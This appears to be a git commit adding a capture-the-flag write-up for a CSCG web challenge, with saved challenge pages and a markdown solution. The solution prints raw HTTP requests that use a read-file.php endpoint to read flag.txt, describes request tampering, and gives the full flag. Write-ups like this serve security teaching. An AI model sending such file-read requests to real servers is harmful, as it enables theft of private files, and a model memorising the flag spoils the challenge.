changed repo structure

This commit is contained in:
2025-06-06 02:50:04 +02:00
parent e887de976a
commit 6e6ee357b8
8848 changed files with 2089898 additions and 9 deletions

View File

@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<session>
<sessionId>1709346750724</sessionId>
<sessionName>Untitled Session</sessionName>
<sessionDesc/>
</session>

View File

@@ -0,0 +1,5 @@
#HSQL Database Engine 2.7.2
#Sat Mar 02 04:14:43 CET 2024
tx_timestamp=61202
modified=no
version=2.7.2

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,19 @@
<html>
<head>
<title>Intro to Web 2</title>
<meta charset="UTF-8">
<link rel="stylesheet" type="text/css" href="style.css" />
</head>
<body>
<h1>Burn After Reading</h1>
This page automatically retrieves confidential information.
To protect against unauthorized use, the backend server will irreversibly nuke all of our data in
case this page is accessed by someone that failed to pass our
<em>Military-Grade Security Gate&#8482;</em>.
<h3>Status of flag document:
<span style="color:green">INTACT</span></h3>
<hr>
<pre>
Flag part 4/4: W4at6R2B}</pre>
</body>
</html>

View File

@@ -0,0 +1,16 @@
<html>
<head>
<title>Intro to Web 2</title>
<meta charset="UTF-8">
<link rel="stylesheet" type="text/css" href="style.css" />
</head>
<body>
<h1>Statistics Console (POST version)</h1>
<h3>File Name:
<span style="font-family: 'Courier New', monospace;">flag.txt</span></h3>
<hr>
<pre>
Flag part 2/4: UaT0BVvk</pre>
</body>
</html>

View File

@@ -0,0 +1,16 @@
<html>
<head>
<title>Intro to Web 2</title>
<meta charset="UTF-8">
<link rel="stylesheet" type="text/css" href="style.css" />
</head>
<body>
<h1>Statistics Console (GET version)</h1>
<h3>File Name:
<span style="font-family: 'Courier New', monospace;">flag.txt</span></h3>
<hr>
<pre>
Flag part 3/4: Q9Z39J9A</pre>
</body>
</html>

View File

@@ -0,0 +1,52 @@
<html>
<head>
<title>Intro to Web 2</title>
<meta charset="UTF-8">
<link rel="stylesheet" type="text/css" href="style.css" />
</head>
<body>
<h1>$(GERMAN_CITY) Tram Ticket Machine</h1>
<h3>Get your <span style="text-decoration: line-through;">ticket</span> flag here!</h3>
<hr>
With the help of our state-of-the-art floppy disk switching robots, you can now read the first
part of the flag in real time!
<p>
Flag part 1/4: <span style="color: green; font-family: 'Courier New', monospace;">
CSCG{<span id="flag">........</span></span>
<!--
No time to wait, right?
-->
<script>
flag = "l9jj550K"
symbolsRevealed = 0
waitTime = 1000;
function nextSymbol() {
if (symbolsRevealed >= flag.length) return;
symbolsRevealed++;
waitTime *= 2;
setTimeout(nextSymbol, waitTime);
}
function spin() {
const flagPart = flag.substr(0, symbolsRevealed);
const alphabet = ("ABCDEFGHIJKLMNOPRSTUVWXYZabcdefhiklmnorstuvwxz0123456789")
const randomSymbol =
symbolsRevealed < flag.length
? alphabet.charAt(Math.floor(Math.random() * alphabet.length))
: "";
const suffix = ".".repeat(Math.max(0, flag.length - 1 - symbolsRevealed));
document.getElementById("flag").innerHTML = flagPart + randomSymbol + suffix;
}
setTimeout(nextSymbol, waitTime);
setInterval(spin, 50);
</script>
</body>
</html>

View File

@@ -0,0 +1,57 @@
### 1.Part
We can spoof our OS with the help of ZAP and get the site [train.html](leaked_sites/train.html)
### 2. Part
There is an unsecure statistics service which shows you the content of every file you specify. We can use this to get the content of flag.txt.
Sending the following request:
```http
POST https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php HTTP/1.1
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
content-length: 17
Origin: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
Connection: keep-alive
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
filename=flag.txt
```
Yields the page [statistics_console.html](leaked_sites/statistics_console.html)
### 3. Part
A similar bug can be used with a GET request to get the content of the flag.txt file.
This time we use a faulty php file called read-file.php
```http
GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php?filename=flag.txt HTTP/1.1
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
content-length: 0
```
Returns the page [statistics_console_get.html](leaked_sites/statistics_console_get.html)
### 4.Part
We now have to intercept a request made and change the authority information.
When we do this we get the fourth part of the flag.
### flag
CSCG{l9jj550KUaT0BVvkQ9Z39J9AW4at6R2B}